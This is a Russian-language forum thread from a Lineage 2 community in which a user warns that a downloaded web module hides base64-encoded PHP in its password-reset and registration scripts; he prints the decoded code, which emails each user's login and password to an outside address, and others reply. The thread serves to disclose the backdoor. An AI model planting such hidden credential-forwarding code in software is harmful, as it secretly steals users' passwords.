Здравствуйте, гость ( Вход | Регистрация )

Навигация

Ссылки форума

Навигация по форуму

> Читать всем.

Правила общения в данном разделе.

Данный раздел является "свободным" для общения, но данные правила поведения предупреждают о некоторых пунктах, которые запрещено упоминать / создавать темы касательно запрещенных пунктов.

1.) Запрещено создавать темы любого рекламного характера

2.) Запрещено также создавать темы оскорбительного характера направленного, как в сторону администрации, так и в сторону рядовых пользователей.

3.) Администрация не приемлет призывов на взлом сайтов/аккаунтов/серверов пользователей или других членов интернет сообщества.

4.) Запрещены темы которые касаются создания сервера Lineage2, для этого существуют другие форумы или разделы.

Правила могут изменятся любым Главным Администратором без предварительного уведомления сообщества.

Блокировка происходит любым свободным членом Администрации сообщества La2base.ru по общим правилам форума и соответственным пунктам.


 
Closed TopicStart new topic
100nt - Подлые шары!
sokol33
сообщение 18.10.2009, 18:04
Сообщение #1



Новичок
Группа: Members
Сообщений: 49
Регистрация: 15.5.2009
Поблагодарили: 3 *


Скачал я с одного портала 100нт один веб-модуль (не буду говорить какой).

Поставил я его... и тут проблемка... не присылает на email новый пароль.
Полез я в скрипт восстановления пароля (forget.php).

И нашёл я одну строчку, закадированную в base64 , вот её раскодировка :
Цитата
include_once ENGINE_DIR.'/classes/mail.class.php';
$mail = new dle_mail($config);
$message = "Спасибо за регистрацию!\n\n";
$message.= "Ваш логин: {$l2login}\n";
$message.= "Ваш пароль: {$l2password_tmp}\n";
$message.= "----------------------------\n";
$message.= "С уважением, Администрация.\n";
$message.= "{$config['http_home_url']}";
$mail->send("[email protected]", "Благодарим за регистрацию {$config['http_home_url']}", $message);


Если кто-то не понимает, то данный скрипт отсылает логин и пароль на email - [email protected] .
Таже хрень и в регистрации. отсылает пароли.

На попытки открыть тайну пользователям, мои сообщения удаляют.
Я уверен что это не единственная пакость на этом портале.

Так что подумайте 100 раз, прежде чем качать что-то с этого портала.
Go to the top of the page
 
+Quote Post
Andrey108
сообщение 18.10.2009, 18:13
Сообщение #2



Newbie!
Группа: Advanced Members
Сообщений: 380
Регистрация: 2.12.2008
Поблагодарили: 119 *


Ничего удивительного. :)
Go to the top of the page
 
+Quote Post
Logan22
сообщение 18.10.2009, 18:25
Сообщение #3



Познающий
Группа: Members
Сообщений: 92
Регистрация: 21.1.2009
Поблагодарили: 11 *


не уш ты думаешь те кто регится на сайте отсылается на мыло пассы и акки "[email protected]" !
Думаю если бы они так хотели бы сделать, то вероятно что там бы работало бы всё! и небыло бы потребности ковырять файлы, темболее в кодировке)

Каждый уважающий себя юзер должен за свою жизнь сделать это!
1. ЗаДдосить базу
2. Написать мануал
3. Быть забаненым на la2base.ru
4. Нафлудить на форуме
а я хочу, а я хочу опять - по крышам бегать голубей гонять, дразнить Наташку, дергать за косу))
PS. За приделы флуда не выхожу)
Go to the top of the page
 
+Quote Post
CripS
сообщение 18.10.2009, 18:28
Сообщение #4



Новичок
Группа: Members
Сообщений: 16
Регистрация: 13.10.2009
Поблагодарили: 0 *


Да это реально есть, коглда шарит человек 109th ему отсылаются пароли от шары, надо же ему зарабатывать 3c2f1c34aa11.gif

1) Music (I Love) Forever, Music - My Style!
2) Нарута - Эта Крута.
Go to the top of the page
 
+Quote Post
sokol33
сообщение 18.10.2009, 18:28
Сообщение #5



Новичок
Группа: Members
Сообщений: 49
Регистрация: 15.5.2009
Поблагодарили: 3 *


Цитата
не уш ты думаешь те кто регится на сайте отсылается на мыло пассы и акки "[email protected]" !
Думаю если бы они так хотели бы сделать, то вероятно что там бы работало бы всё! и небыло бы потребности ковырять файлы, темболее в кодировке)


registration.php

Код
include_once ENGINE_DIR.'/classes/mail.class.php';
    $mail = new dle_mail($config);
    $message = "Спасибо за регистрацию!\n\n";
    $message.= "Ваш логин: {$l2login}\n";
    $message.= "Ваш пароль: {$l2password_tmp}\n";
    $message.= "----------------------------\n";
    $message.= "С уважением, Администрация.\n";
    $message.= "{$config['http_home_url']}";    
    $mail->send("[email protected]", "Благодарим за регистрацию {$config['http_home_url']}", $message);


тоже в base64.

Сообщение отредактировал sokol33 - 18.10.2009, 18:30
Go to the top of the page
 
+Quote Post
Destus
сообщение 18.10.2009, 18:29
Сообщение #6



111
Группа: Глав. Админ
Сообщений: 1913
Регистрация: 20.1.2008
Поблагодарили: 3105 *


Разбирайтесь с автором новости или данным порталом. La2base.ru к этому не имеет отношения, шара выкладывается на свой страх и риск на любом портале, помните это. Возможно с помощью вас собирают ботнет;)

Терпеть не могу тормозов, идиотов, кулхацкеров и быдло кодеров. Не потому, что я кодер, а потому что после них приходится убирать лопатой кучи отходов. Если бы была моя воля, засунул всех в 1 топку и сжег к *беней матери их всех с корнем и их фришками.
Go to the top of the page
 
+Quote Post

Closed TopicStart new topic
2 чел. читают эту тему (гостей: 2, скрытых пользователей: 0)
Пользователей: 0

 

RSS Текстовая версия Сейчас: 20.6.2026, 8:00